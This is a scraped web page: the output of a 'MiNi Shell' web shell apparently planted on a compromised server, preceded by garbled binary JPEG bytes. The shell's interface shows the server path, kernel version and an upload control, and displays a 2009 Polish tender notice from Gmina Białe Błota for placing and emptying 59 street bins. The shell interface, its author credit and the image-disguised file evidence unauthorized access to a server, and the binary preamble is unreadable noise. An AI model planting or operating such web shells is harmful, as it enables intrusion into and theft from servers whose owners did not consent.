JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091015/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091015/178739-N-2009.html

<p class="kh_header"><b>Białe Błota: WYKONANIE  USŁUG  ZWIĄZANYCH  Z  DOSTAWĄ, USTAWIENIEM, DZIERŻAWĄ, UTRZYMYWANIEM  I OPRÓŻNIANIEM  KOSZY ULICZNYCH MIEJSCOWOŚCIACH  NA TERENIE GMINY BIAŁE BŁOTA</b><br>
<b>Numer ogłoszenia: 178739 - 2009; data zamieszczenia: 15.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Białe Błota , ul. Szubińska 7, 86-005 Białe Błota, woj. kujawsko-pomorskie, tel. 052 3239090, faks 052 3239080.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bialeblota.bki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> WYKONANIE  USŁUG  ZWIĄZANYCH  Z  DOSTAWĄ, USTAWIENIEM, DZIERŻAWĄ, UTRZYMYWANIEM  I OPRÓŻNIANIEM  KOSZY ULICZNYCH MIEJSCOWOŚCIACH  NA TERENIE GMINY BIAŁE BŁOTA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonywanie usług według  wymogów ;
1) Wykonawca dostarczy i rozmieści  kosze uliczne  o pojemności 40-50 litrów, ze stali ocynkowanej zamykane od góry ( np. daszkiem) w ilości 59 sztuk
2) Opróżnianie koszy:
  a) Wykonawca będzie opróżniał kosze uliczne oraz oczyszczał bezpośrednie sąsiedztwo z odpadów z taka częstotliwością, aby kosze nie były przepełnione przez cały okres rozliczeniowy, nawet codziennie jeżeli zachodzi taka potrzeba,
    b) wywozu odpadów z koszy  należy dokonywać pojazdem bezpylnym zgodnie z obowiązującą technologią,
    c) jednostką rozliczeniową będzie  cena za obsługę jednego kosza przez pełny miesiąc.
 
3)  Wykonawca ma obowiązek naprawy koszy w przypadku ich uszkodzenia bądź też wymiany w przypadku kradzieży. 
 
Białe Błota (30 sztuk)
1.	ul. Szubińska :
-	1 kosz przejście dla pieszych na wysokości wjazdu na ulicę Przemysłową,
-	1 kosz przejście dla pieszych w okolicy Urzędu Gminy,
2.  ul. Cukrowa:
-	1 kosz róg ulicy Centralnej i Cukrowej,
-	1 kosz róg ulicy Szubińskiej i Cukrowej,
3.	ul. Guliwera:
-	1 kosz przy budynku poczty,
-	1 kosz róg Guliwera i Barwinkowej,
4.	ul. Berberysowa:
-	1 kosz róg Berberysowej i Szubińskiej,
-	1 kosz w pobliżu bloków mieszkalnych na wysokości pawilonów
5.	ul. Centralna:
-	1 kosz ul. Centralna przy przystanku BUS,
-	1 kosz przed szkołą,
-	1 kosz róg Czerskiej i Centralnej,
-	1 kosz przed wejściem na teren  przedszkola,
-	2 kosze przy lesie z prawej strony (jeden za ul. Czerską, drugi przed ul. Czahary),
-	1 kosz róg Popiela i Centralnej,
-	1 kosz róg Baryckiej i Centralnej (przed  rondem)
6.	ul. Czysta:
-	przed budynkiem Gimnazjum
7.	ul. Chlebowa:
-	1 kosz w pobliżu ul. Chełmskiej,
-	1 kosz w pobliżu ul. Chudoby,
-	1 kosz róg ul. Duńskiej,
-	1 kosz róg ul. Czajczej,
-	1 kosz róg ul. Cukierniczej
8.	ul. Czerska:
-	1 kosz róg Czerskiej i Szubińskiej,
-	1 kosz przy kościele,
-	1 kosz przy przystanku BUS,
-	1 kosz róg Czerskiej i Bajecznej,
9.	ul. Barycka:
-	1 kosz przy Przychodni
10.	ul. Jutrzenki:
-	1 kosz róg Czerskiej i Jutrzenki
11.	ul. Barwinkowa:
-	1 kosz róg ulicy Goplany
12.	ul. Betonowa:
-	1 kosz w pobliżu Zakładu Wodociągów i Usług Komunalnych
Łochowo (14 sztuk)
1.	ul. Wierzbowa:
-	1 kosz przed wejściem na teren Zespołu Szkół,
2.	ul. Dębowa:
-	1 kosz przy parkingu,
-	1 kosz róg ul. Cedrowej (na przeciw Plebani),
-	1 kosz róg ul. Modrzewiowej
3.	ul. Jałowcowa:
-	1 kosz przy Wiejskim Ośrodku Kultury,
4.	ul. Szosa Bydgoska:
-	1 kosz róg ul. Świerkowej,
-	1 kosz róg ul. Brzozowej,
-	1 kosz róg ul. Cisowej,
-	1 kosz przy przejściu dla pieszych na przeciw wiaty przy ul. Grabowej,
-	1 kosz przy przystanku autobusowym róg ulicy Kasztanowej,
5.	ul. Szosa Nakielska:
-	1 kosz na łuku chodnika w kierunku wjazdu na ul. Żurawinową,
-	1 kosz koniec chodnika w kierunku Łochowic,
-	1 kosz przy przystanku autobusowym róg ulicy Topolowej,
6.	ul. Porzeczkowa 
 -    1 kosz przy przychodni,
Trzciniec (3 sztuki):
ul. Sarnia:
-	1 kosz na wysokości numerów 2 i 4,
-	1 kosz róg Łosiowej i Sarniej,
-	1 kosz róg ul. Jemiołowej.

Zielonka (3 sztuki):
1.	ul. Bydgoska:
-	1 kosz róg ul. Jagodowej,
-	1 kosz pomiędzy ulicami Bocianowo i Jaworowa.
2.	ul. Bocianowo:
-	1 kosz róg ul. Biedronki

Ciele (3 sztuki):
1.	ul. Kościelna:
-	róg ul. Kupieckiej,
2.	ul. Osiedle:
-	przed świetlicą socjoterapeutyczną,
3.	ul. Pogodna:
 -   róg ul. Uroczej.
Przyłęki (4 sztuki):
1.	ul. Zabytkowa:
-  1 kosz przy boisku,
-  3 kosze  przy domkach
Kruszyn Krajeński ( 2 sztuki):
1.	ul. Słoneczna 
-  1 kosz przy ul. Słonecznej 17a,
-  1 kosz przy sklepie 
2) Zamawiający dopuszcza umieszczenie na koszach logo firmy. Stan techniczny i estetyka koszy musi być nienaganna. Usługa uważana będzie za niewykonaną lub  wykonane z nienależytą starannością w przypadku stwierdzenia przepełnienia koszy, zalegania nieczystości wokół koszy,  niewłaściwego stanu techniczno-estetycznego lub ich braku.
3) W trakcie trwania umowy Zamawiający zastrzega sobie prawo do zwiększenia ilości koszy ulicznych w miejsca wyznaczone przez Zamawiającego. Termin wykonania usługi do 21 dni, po wcześniejszym pisemnym zleceniu..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 90.51.13.00-5, 90.51.20.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:
a) spełniają warunki określone w art. 22 ustawy Prawo Zamówień Publicznych z dnia 29 stycznia 2004 r. ( Dz. U. Nr 223 z 2007r, poz. 1655 ) i dysponują dokumentem potwierdzajacym posiadanie uprawnień do świadczenia usług objętych zamówieniem,
b) nie podlegają wykluczeniu na podstawie art. 24 ustawy Prawo Zamówień Publicznych z dnia 29 stycznia 2004 r. ( Dz. U. Nr 223 z 2007r, poz. 1655),
c) złożyli wszystkie wymagane dokumenty określone w pkt 7 SIWZ,
2. Ocena spełniania warunków wymaganych od Wykonawców zostanie dokonana:
a) według formuły: spełnia - nie spełnia tj. na podstawie analizy załączonych dokumentów potwierdzających spełnianie warunków uczestnictwa w postępowaniu, jako minimum kwalifikujące do udziału w postępowaniu,
b) na podstawie art. 26 ust 3 i 4 ustawy Prawo Zamówień Publicznych z dnia 29 stycznia 2004 r. ( Dz. U. Nr 223 z 2007r, poz. 1655) Zamawiający będzie zobowiązany wezwać wszystkich Wykonawców, którzy nie złożyli w określonym terminie oświadczeń i dokumentów potwierdzających spełnianie warunków udziału w postępowaniu lub którzy złożyli dokumenty zawierając błędy, do ich uzupełnienia w wyznaczonym terminie, 
c) dopuszcza się składanie kserokopii dokumentów poświadczonych za zgodność z oryginałem przez osoby uprawnione do reprezentacji podmiotu ujawnione w KRS lub w zgłoszeniu do ewidencji działalności gospodarczej.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) wypełniony formularz ofertowy - Załącznik nr 1 do SIWZ
2)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do
ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, (w przypadku składania oferty przez wykonawców występujących wspólnie, ww. dokument musi być złożony przez każdego wykonawcę);
3)oświadczenie, że Wykonawca spełnia warunki udziału w postępowaniu, określone w art. 22 ust. 1 Ustawy prawo zamówień publicznych; 
4) oświadczenie Wykonawcy że nie zalega z opłacaniem podatków na rzecz Urzędu Skarbowego, ( przypadku składania oferty przez wykonawców występujących wspólnie, ww. oświadczenie  musi być złożony przez każdego wykonawcę);
5)  oświadczenie, Wykonawcy,  że nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, (w przypadku składania oferty przez wykonawców występujących wspólnie, ww. oświadczenie musi być złożone przez każdego wykonawcę);
 6)  oświadczenie Wykonawcy o wykonaniu   usług  o  tożsamym lub  podobnym zakresie stanowiącym przedmiot zamówienia- wymagane przez Zamawiającego wykonanie 2 zadań w ciągu ostatnich 5 lat;
7)oświadczenie z art. 24 ust.1 ustawy prawo zamówień publicznych,
8)karty katalogowe oferowanych koszy ( kolorowe,  w języku polskim),
9)zaparafowany projekt umowy - Załącznik nr 2 do SIWZ..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.bialeblota.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.bialeblota.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.10.2009 godzina 10:00, miejsce: Oferty należy złożyć w Urzędzie Gminy Białe Błota ul. Szubińska 7 w Sekretariacie pokój nr 24.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com